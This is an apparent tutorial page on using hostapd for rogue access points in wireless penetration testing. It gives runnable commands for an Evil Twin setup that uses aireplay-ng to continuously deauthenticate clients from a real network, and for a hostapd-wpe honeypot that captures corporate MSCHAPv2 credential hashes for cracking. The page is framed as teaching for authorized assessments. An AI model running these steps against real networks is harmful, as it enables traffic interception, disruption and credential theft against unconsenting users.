← Back to Tools
Tools / Wireless / Hostapd
Wireless

Hostapd

Linux daemon for creating software-based access points — the backbone of evil twin attacks, rogue AP setups, and WPA Enterprise honeypots in authorized wireless security assessments.

Category
Wireless
Platform
Linux / Kali
Type
CLI / Daemon / Open Source
Skill Level
Intermediate → Advanced

What is Hostapd?

Hostapd (Host Access Point Daemon) is a Linux userspace daemon that turns a wireless network interface into a fully functional IEEE 802.11 access point. It handles all the Wi-Fi management frames — authentication, association, beacon broadcasts — and supports WEP, WPA, WPA2 (Personal and Enterprise), and open networks. In penetration testing it is primarily used to create rogue access points: either an open or WPA-matching Evil Twin AP to lure clients away from a legitimate network, or a WPA Enterprise honeypot to capture enterprise credential hashes.

Hostapd does not provide DHCP or internet routing on its own — it must be paired with dnsmasq (for DHCP/DNS) and iptables NAT rules (for internet access) to create a fully functional rogue AP that clients can actually use. Together, this stack is the foundation of most wireless MITM attack labs.

⚠ Legal Notice

Creating a rogue access point on any network you do not own or have explicit written permission to test is a criminal offense. Unauthorized Evil Twin or rogue AP deployment violates Pakistan's PECA 2016 and international cybercrime laws. Use only in isolated lab environments or authorized wireless assessments.

Installation

# Install hostapd and supporting tools
sudo apt update
sudo apt install hostapd dnsmasq iptables -y

# Check version
hostapd -v

# Verify wireless interface supports AP mode
iw list | grep -A 10 "Supported interface modes" | grep AP

Basic Open Access Point

The simplest setup — an open (no password) access point. All configuration lives in a plain text config file passed to hostapd at runtime.

# Step 1: Create the hostapd configuration file
cat > /tmp/hostapd_open.conf << EOF
interface=wlan0          # your wireless interface
driver=nl80211           # standard Linux wireless driver
ssid=FreeWiFi            # AP name (SSID)
hw_mode=g                # 802.11g (2.4 GHz)
channel=6                # Wi-Fi channel
macaddr_acl=0            # allow all MAC addresses
ignore_broadcast_ssid=0  # broadcast SSID (visible)
EOF

# Step 2: Start the access point
sudo hostapd /tmp/hostapd_open.conf

# Step 3: Run in background / daemon mode
sudo hostapd -B /tmp/hostapd_open.conf

# Step 4: Stop the daemon
sudo kill $(cat /var/run/hostapd.pid)
# or just Ctrl+C if running in foreground

WPA2 Personal Access Point

# WPA2-PSK configuration
cat > /tmp/hostapd_wpa2.conf << EOF
interface=wlan0
driver=nl80211
ssid=TargetNetwork
hw_mode=g
channel=6
macaddr_acl=0
auth_algs=1
ignore_broadcast_ssid=0
wpa=2
wpa_passphrase=Password123
wpa_key_mgmt=WPA-PSK
wpa_pairwise=TKIP
rsn_pairwise=CCMP
EOF

sudo hostapd /tmp/hostapd_wpa2.conf

Evil Twin AP Setup

An Evil Twin AP mimics a legitimate network — same SSID, stronger signal — to de-authenticate clients from the real AP and capture their re-association handshakes or credentials. This requires both hostapd and a deauth mechanism (e.g. aireplay-ng on a separate interface).

# Step 1: Find the target AP's details (SSID, channel, BSSID)
sudo airodump-ng wlan0

# Step 2: Create Evil Twin config matching the target SSID and channel
cat > /tmp/evil_twin.conf << EOF
interface=wlan1          # second wireless adapter for the AP
driver=nl80211
ssid=TargetSSID          # MUST match the real AP's SSID exactly
hw_mode=g
channel=11               # MUST match the real AP's channel
macaddr_acl=0
ignore_broadcast_ssid=0
EOF

# Step 3: Start Evil Twin AP
sudo hostapd /tmp/evil_twin.conf &

# Step 4: Add DHCP with dnsmasq so clients get an IP
cat > /tmp/dnsmasq_evil.conf << EOF
interface=wlan1
dhcp-range=192.168.50.10,192.168.50.100,12h
dhcp-option=3,192.168.50.1
dhcp-option=6,192.168.50.1
server=8.8.8.8
EOF

sudo ip addr add 192.168.50.1/24 dev wlan1
sudo dnsmasq -C /tmp/dnsmasq_evil.conf

# Step 5: Enable NAT forwarding (optional — gives clients internet)
sudo iptables -t nat -A POSTROUTING -o eth0 -j MASQUERADE
sudo sysctl -w net.ipv4.ip_forward=1

# Step 6: Deauth clients from real AP on separate interface (wlan0)
sudo aireplay-ng --deauth 0 -a BSSID_OF_REAL_AP wlan0

WPA Enterprise Honeypot (EAP Credential Capture)

Corporate networks often use WPA Enterprise (802.1X / EAP) with usernames and passwords. A rogue WPA Enterprise AP can capture these credentials — typically as MSCHAPv2 hashes — when clients attempt to connect. This requires hostapd-wpe (Wireless Pwnage Edition), a patched version of hostapd.

# Install hostapd-wpe (Kali)
sudo apt install hostapd-wpe -y

# hostapd-wpe includes a default config at:
# /etc/hostapd-wpe/hostapd-wpe.conf

# Edit to match the target corporate SSID
sudo nano /etc/hostapd-wpe/hostapd-wpe.conf
# Set: ssid=CorporateWiFi
# Set: interface=wlan0
# Set: channel=6

# Start the honeypot
sudo hostapd-wpe /etc/hostapd-wpe/hostapd-wpe.conf

# Captured credentials appear in: /var/log/hostapd-wpe.log
# MSCHAPv2 hashes can be cracked with asleap or hashcat (-m 5500)
cat /var/log/hostapd-wpe.log

Key Configuration Directives

Common CLI Flags

Common Use Cases

Further Reading

Hostapd is rarely used alone — the full Evil Twin stack also involves dnsmasq, iptables, aircrack-ng, and optionally bettercap or mitmproxy for traffic interception. For automated rogue AP frameworks that combine all these tools, look at airgeddon and wifiphisher — both wrap hostapd internally. For WPA Enterprise attacks, study MSCHAPv2 cracking with asleap and hashcat. Practice in isolated lab environments using two wireless adapters on hackzia.site labs.